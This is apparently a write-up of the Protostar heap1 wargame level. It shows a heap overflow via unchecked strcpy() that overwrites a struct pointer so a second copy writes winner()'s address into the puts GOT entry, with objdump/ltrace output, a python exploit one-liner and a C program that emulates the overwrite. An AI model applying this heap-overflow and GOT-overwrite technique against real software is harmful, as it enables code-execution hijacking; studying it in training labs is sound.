This level takes a look at code flow hijacking in data overwrite cases.
Source Code:
OK, this looks a lot like heap0, except there is no function pointer to overwrite this time. What we do have is two heap-allocated structs whose name buffers are filled by strcpy() from argv[1] and argv[2] with no length check, and i1's name buffer sits directly below i2 on the heap. So the plan: find the puts entry in the Global Offset Table (GOT), overflow i1->name from argv[1] so that the i2->name pointer is replaced with the address of that GOT entry, and pass the address of winner() as argv[2]. The second strcpy() then writes winner's address into the GOT, and the final printf() call in main (which gcc compiles into a puts() call, as the ltrace output further down shows) jumps to winner() instead.
Let's start by finding the address of puts in the GOT:
user@protostar:/opt/protostar/bin$ objdump -TR ./heap1
./heap1: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 strcpy
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 time
00000000 DF *UND* 00000000 GLIBC_2.0 malloc
00000000 DF *UND* 00000000 GLIBC_2.0 puts
0804862c g DO .rodata 00000004 Base _IO_stdin_used
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804974c R_386_GLOB_DAT __gmon_start__
0804975c R_386_JUMP_SLOT __gmon_start__
08049760 R_386_JUMP_SLOT __libc_start_main
08049764 R_386_JUMP_SLOT strcpy
08049768 R_386_JUMP_SLOT printf
0804976c R_386_JUMP_SLOT time
08049770 R_386_JUMP_SLOT malloc
08049774 R_386_JUMP_SLOT puts
Now let's find our target address (winner):
user@protostar:/opt/protostar/bin$ objdump -t ./heap1 | grep "winner"
08048494 g F .text 00000025 winner
Now we need the heap addresses of the two structures and their name buffers. ltrace shows all four malloc() calls and which buffers the two strcpy() calls write into:
user@protostar:/opt/protostar/bin$ ltrace ./heap1 AAAA BBBB
__libc_start_main(0x80484b9, 3, 0xbffff894, 0x8048580, 0x8048570 <unfinished ...>
malloc(8) = 0x0804a008
malloc(8) = 0x0804a018
malloc(8) = 0x0804a028
malloc(8) = 0x0804a038
strcpy(0x0804a018, "AAAA") = 0x0804a018
strcpy(0x0804a038, "BBBB") = 0x0804a038
puts("and that's a wrap folks!"and that's a wrap folks!
) = 25
+++ exited (status 25) +++
Now, let's trigger the overwrite. i1->name's buffer starts at 0x0804a018 and i2 at 0x0804a028, so the i2->name pointer (4 bytes into the struct, after priority) lives at 0x0804a02c, 20 bytes past the start of the buffer. argv[1] is therefore 20 bytes of filler followed by the little-endian address of the puts GOT entry (0x08049774), and argv[2] is the little-endian address of winner() (0x08048494). The trailing newline that python's print appends gets copied as well, but it lands just past both targets and does no harm here:
user@protostar:/opt/protostar/bin$ ./heap1 $(python -c "print 'x'*20 + '\x74\x97\x04\x08'") $(python -c "print '\x94\x84\x04\x08'")
and we have a winner @ 1417009928
Done!
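To make the offset arithmetic and the two-stage write concrete, here is an added C example; it is not code from the Protostar level or from this post. It rebuilds the heap layout the ltrace run shows (i1->name's 8-byte buffer, the chunk header in front of i2, then i2 itself) as a struct, derives the filler length from that layout (20 bytes on a 32-bit build, 32 on a 64-bit host), emits the exact argv[1] bytes the python one-liner prints, and replays the two strcpy() calls against a stand-in for the puts GOT slot in the process's own memory. The struct internet, the winner() and fake_puts() functions and the puts_slot variable are assumptions standing in for the real binary; memcpy replaces strcpy so that 64-bit addresses, which contain NUL bytes, survive the copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The level's struct as the walkthrough describes it (int priority, then a name pointer). */
struct internet {
    int priority;
    char *name;
};

/* Stand-in for the puts() GOT slot: a writable function pointer that the end of
   main() calls. The dynamic loader fills the real slot; here it starts out pointing
   at a harmless fake puts. fake_puts/winner/puts_slot are hypothetical names. */
static int fake_puts(const char *s) { (void)s; return 0; }
static int winner_hit = 0;
static int winner(const char *s) { (void)s; winner_hit = 1; return 1; }
static int (*volatile puts_slot)(const char *) = fake_puts;

/* Emulated heap, laid out the way the four malloc(8) calls leave it: i1->name's
   buffer, the chunk header (prev_size, size) that precedes i2, i2 itself, then
   i2->name's buffer. On a 32-bit build the i2->name pointer sits 8 + 8 + 4 = 20
   bytes after the start of i1->name, matching the level; on 64-bit it is 32. */
struct arena {
    char   i1_name[8];
    size_t hdr[2];
    struct internet i2;
    char   i2_name[8];
};

/* Filler bytes argv[1] needs before it reaches the i2->name pointer. */
size_t padding_to_i2_name(void) {
    return offsetof(struct arena, i2) + offsetof(struct internet, name);
}

/* argv[1] for the level itself: 20 filler bytes, then the puts GOT entry 0x08049774
   in little-endian order (the python one-liner's output minus its trailing newline). */
size_t build_level_argv1(unsigned char *out, size_t cap) {
    const uint32_t got_puts = 0x08049774u;
    const size_t pad = 20;
    if (cap < pad + sizeof got_puts) return 0;
    memset(out, 'x', pad);
    for (size_t i = 0; i < sizeof got_puts; i++)
        out[pad + i] = (unsigned char)(got_puts >> (8 * i));
    return pad + sizeof got_puts;
}

/* 1 if build_level_argv1() reproduces the bytes the python one-liner prints. */
int level_argv1_matches_oneliner(void) {
    unsigned char buf[32];
    size_t n = build_level_argv1(buf, sizeof buf);
    return n == 24 && memcmp(buf, "xxxxxxxxxxxxxxxxxxxx\x74\x97\x04\x08", 24) == 0;
}

/* Replay the level's two strcpy() calls against the emulated heap, using this
   process's own addresses, and report whether the final puts() reached winner(). */
int run_exploit(void) {
    struct arena heap;
    unsigned char *i1_name = (unsigned char *)&heap;   /* i1->name points at the first buffer */
    unsigned char argv1[64];
    uintptr_t slot = (uintptr_t)&puts_slot;            /* plays the role of the GOT address */
    int (*target)(const char *) = winner;              /* what argv[2] carries */
    size_t pad = padding_to_i2_name();

    winner_hit = 0;
    puts_slot = fake_puts;
    memset(&heap, 0, sizeof heap);
    heap.i2.priority = 2;
    heap.i2.name = heap.i2_name;

    /* argv[1] = filler + slot address in native (little-endian on x86) byte order. */
    memset(argv1, 'x', pad);
    memcpy(argv1 + pad, &slot, sizeof slot);

    /* strcpy(i1->name, argv[1]) overruns the 8-byte buffer and replaces i2->name.
       memcpy stands in for strcpy: the level's 32-bit addresses contain no NUL
       byte, but a 64-bit address does, and strcpy would stop at it. */
    memcpy(i1_name, argv1, pad + sizeof slot);

    /* strcpy(i2->name, argv[2]) now writes winner's address into the slot. */
    memcpy(heap.i2.name, &target, sizeof target);

    /* printf("and that's a wrap folks!\n") is compiled to puts(), which goes
       through the hijacked slot. */
    puts_slot("and that's a wrap folks!");
    return winner_hit;
}

int main(void) {
    printf("padding on this host: %zu bytes\n", padding_to_i2_name());
    printf("level argv[1] matches one-liner: %s\n", level_argv1_matches_oneliner() ? "yes" : "no");
    printf("winner reached: %s\n", run_exploit() ? "yes" : "no");
    return 0;
}
```

Build it with gcc and run it on any host; the padding it reports is derived from the struct, not hard-coded, which is the check to do before trusting a 'x'*N count from a different binary or libc. The strcpy-versus-memcpy caveat in run_exploit() is also why this particular overwrite is comfortable on the 32-bit level: 0x08049774 and 0x08048494 contain no zero byte, so strcpy copies them whole.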
Great, thanks!